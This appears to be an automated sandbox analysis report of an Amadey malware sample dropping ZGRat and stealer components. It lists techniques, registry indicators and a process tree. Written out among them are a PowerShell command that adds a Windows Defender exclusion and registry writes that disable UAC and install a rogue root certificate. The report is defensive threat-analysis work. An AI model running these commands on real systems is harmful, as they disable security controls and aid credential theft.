amadey | 093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 2 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3d9ab43b67.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 30 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2168	powershell.exe
5008	powershell.exe
4112	powershell.exe
2780	powershell.exe
1852	powershell.exe
5588	powershell.exe
5404	powershell.exe
5848	powershell.exe
248	powershell.exe
4912	powershell.exe
1920	powershell.exe
5880	powershell.exe
1804	powershell.exe
3144	powershell.exe
5016	powershell.exe
1660	powershell.exe
5992	powershell.exe
2896	powershell.exe
4044	powershell.exe
5556	powershell.exe
5412	powershell.exe
2076	powershell.exe
1640	powershell.exe
4488	powershell.exe
4556	powershell.exe
464	powershell.exe
5920	powershell.exe
4900	powershell.exe
5996	powershell.exe
6048	powershell.EXE

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1240	netsh.exe
5956	netsh.exe
6072	netsh.exe
3192	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3d9ab43b67.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3d9ab43b67.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Up1qqekag7WhTVHNNzhYAC6W.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PutKr12G5F4DdwJeAYnHBjk0.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwfEee6uWOzf3T6tGb3oRfQx.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QNrHv4yvxVKjxH5BmK0QjpuE.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DgWpgUzfioDV2EqRPBvwacLo.bat	AddInProcess32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rnjisUfEI5HrhQJUoNpDWbWU.bat	AddInProcess32.exe

Executes dropped EXE 16 IoCs

pid	Process
1476	explorta.exe
1324	explorta.exe
2056	amert.exe
4788	explorha.exe
832	swiiiii.exe
2924	jok.exe
3936	3d9ab43b67.exe
464	swiiii.exe
2256	file300un.exe
3660	9f804f8a84.exe
776	S1RqBEWJrAFynQ3ALpu1u1UT.exe
3612	mqSv1xI7xXqVmGkwozUFdfvN.exe
4348	QlQEvziFMMGDiMl1m7FF3gPC.exe
3216	gold.exe
4428	l9jDp8WITIcW8BKp7KtW90LN.exe
3668	GVeSoaWSVE79kYgk3qrksfku.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Wine	explorha.exe

Loads dropped DLL 2 IoCs

pid	Process
3680	rundll32.exe
4456	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 44 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/2360-0-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/memory/2360-1-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/memory/2360-2-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/memory/2360-5-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/memory/2360-6-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/memory/2360-3-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/memory/2360-4-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/memory/2360-7-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/files/0x000100000002a9f0-13.dat	themida
behavioral2/memory/1476-21-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1476-23-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1476-24-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1476-22-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1476-25-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1476-27-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1476-28-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1476-26-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/2360-20-0x00000000002D0000-0x0000000000816000-memory.dmp	themida
behavioral2/memory/1476-29-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-36-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-37-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-41-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-42-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-40-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-39-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-43-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-38-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/1324-45-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/files/0x000100000002a9f5-164.dat	themida
behavioral2/memory/1476-165-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/3936-166-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/3936-167-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/3936-168-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/3936-170-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/3936-181-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/3936-182-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/3936-180-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/3936-179-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/3936-169-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/memory/1476-433-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida
behavioral2/memory/3936-434-0x0000000000960000-0x0000000000FDD000-memory.dmp	themida
behavioral2/files/0x000200000002aa42-565.dat	themida
behavioral2/memory/6064-572-0x0000000140000000-0x0000000140862000-memory.dmp	themida
behavioral2/memory/3104-966-0x0000000000890000-0x0000000000DD6000-memory.dmp	themida

Windows security modification 2 TTPs 3 IoCs

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\9f804f8a84.exe = "C:\\Users\\Admin\\1000021002\\9f804f8a84.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\3d9ab43b67.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\3d9ab43b67.exe"	explorta.exe

Checks whether UAC is enabled 1 TTPs 6 IoCs

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3d9ab43b67.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
38	api.myip.com
68	api.myip.com
70	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000200000002aa08-226.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2056	amert.exe
4788	explorha.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 832 set thread context of 3988	832	swiiiii.exe	89
PID 464 set thread context of 4428	464	swiiii.exe	123
PID 2256 set thread context of 2028	2256	file300un.exe	102
PID 3216 set thread context of 2876	3216	gold.exe	121

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorha.job	amert.exe
File created	C:\Windows\Tasks\explorta.job	093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5188	sc.exe
5884	sc.exe
3160	sc.exe
1356	sc.exe
1996	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
4900	832	WerFault.exe
5412	6124	WerFault.exe	148
5536	776	WerFault.exe	111
800	5244	WerFault.exe	140
3604	5852	WerFault.exe	219
6132	5976	WerFault.exe	207

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3552	schtasks.exe
4112	schtasks.exe
3608	schtasks.exe
3888	schtasks.exe
2012	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
5932	tasklist.exe
5384	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3328	PING.EXE

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
2056	amert.exe
2056	amert.exe
4788	explorha.exe
4788	explorha.exe
2168	powershell.exe
2168	powershell.exe
3440	chrome.exe
3440	chrome.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
2924	jok.exe
4456	rundll32.exe
4456	rundll32.exe
4456	rundll32.exe
4456	rundll32.exe
4456	rundll32.exe
4456	rundll32.exe
2924	jok.exe
2924	jok.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2256	file300un.exe
Token: SeDebugPrivilege	2028	AddInProcess32.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeShutdownPrivilege	3440	chrome.exe
Token: SeCreatePagefilePrivilege	3440	chrome.exe
Token: SeShutdownPrivilege	3440	chrome.exe
Token: SeCreatePagefilePrivilege	3440	chrome.exe
Token: SeShutdownPrivilege	3440	chrome.exe
Token: SeCreatePagefilePrivilege	3440	chrome.exe
Token: SeShutdownPrivilege	3440	chrome.exe
Token: SeCreatePagefilePrivilege	3440	chrome.exe
Token: SeShutdownPrivilege	3440	chrome.exe
Token: SeCreatePagefilePrivilege	3440	chrome.exe
Token: SeDebugPrivilege	2924	jok.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3660	9f804f8a84.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe

Suspicious use of SendNotifyMessage 23 IoCs

pid	Process
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3660	9f804f8a84.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3440	chrome.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe
3660	9f804f8a84.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 1476	2360	093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe	82
PID 2360 wrote to memory of 1476	2360	093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe	82
PID 2360 wrote to memory of 1476	2360	093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe	82
PID 1476 wrote to memory of 3464	1476	explorta.exe	83
PID 1476 wrote to memory of 3464	1476	explorta.exe	83
PID 1476 wrote to memory of 3464	1476	explorta.exe	83
PID 1476 wrote to memory of 2056	1476	explorta.exe	85
PID 1476 wrote to memory of 2056	1476	explorta.exe	85
PID 1476 wrote to memory of 2056	1476	explorta.exe	85
PID 2056 wrote to memory of 4788	2056	amert.exe	86
PID 2056 wrote to memory of 4788	2056	amert.exe	86
PID 2056 wrote to memory of 4788	2056	amert.exe	86
PID 4788 wrote to memory of 832	4788	explorha.exe	87
PID 4788 wrote to memory of 832	4788	explorha.exe	87
PID 4788 wrote to memory of 832	4788	explorha.exe	87
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 832 wrote to memory of 3988	832	swiiiii.exe	89
PID 4788 wrote to memory of 2924	4788	explorha.exe	93
PID 4788 wrote to memory of 2924	4788	explorha.exe	93
PID 4788 wrote to memory of 2924	4788	explorha.exe	93
PID 1476 wrote to memory of 3936	1476	explorta.exe	94
PID 1476 wrote to memory of 3936	1476	explorta.exe	94
PID 1476 wrote to memory of 3936	1476	explorta.exe	94
PID 4788 wrote to memory of 464	4788	explorha.exe	116
PID 4788 wrote to memory of 464	4788	explorha.exe	116
PID 4788 wrote to memory of 464	4788	explorha.exe	116
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 464 wrote to memory of 4428	464	swiiii.exe	123
PID 4788 wrote to memory of 2256	4788	explorha.exe	128
PID 4788 wrote to memory of 2256	4788	explorha.exe	128
PID 2256 wrote to memory of 2168	2256	file300un.exe	100
PID 2256 wrote to memory of 2168	2256	file300un.exe	100
PID 2256 wrote to memory of 2028	2256	file300un.exe	102
PID 2256 wrote to memory of 2028	2256	file300un.exe	102
PID 2256 wrote to memory of 2028	2256	file300un.exe	102
PID 2256 wrote to memory of 2028	2256	file300un.exe	102
PID 2256 wrote to memory of 2028	2256	file300un.exe	102
PID 2256 wrote to memory of 2028	2256	file300un.exe	102
PID 2256 wrote to memory of 2028	2256	file300un.exe	102
PID 2256 wrote to memory of 2028	2256	file300un.exe	102
PID 2256 wrote to memory of 2004	2256	file300un.exe	103
PID 2256 wrote to memory of 2004	2256	file300un.exe	103
PID 2256 wrote to memory of 2004	2256	file300un.exe	103
PID 1476 wrote to memory of 3660	1476	explorta.exe	254
PID 1476 wrote to memory of 3660	1476	explorta.exe	254
PID 1476 wrote to memory of 3660	1476	explorta.exe	254
PID 3660 wrote to memory of 3440	3660	9f804f8a84.exe	107
PID 3660 wrote to memory of 3440	3660	9f804f8a84.exe	107
PID 3440 wrote to memory of 4444	3440	chrome.exe	110
PID 3440 wrote to memory of 4444	3440	chrome.exe	110

System policy modification 1 TTPs 1 IoCs

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe
"C:\Users\Admin\AppData\Local\Temp\093f831460eb697ac964d41392c8d2dc9f060910401efc8e71463cac1ae665da.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    PID:3464
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4788
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:832
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3988
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 876
        6⤵
        Program crash
        
        PID:4900
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2924
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:464
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4428
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:2256
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2168
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
        
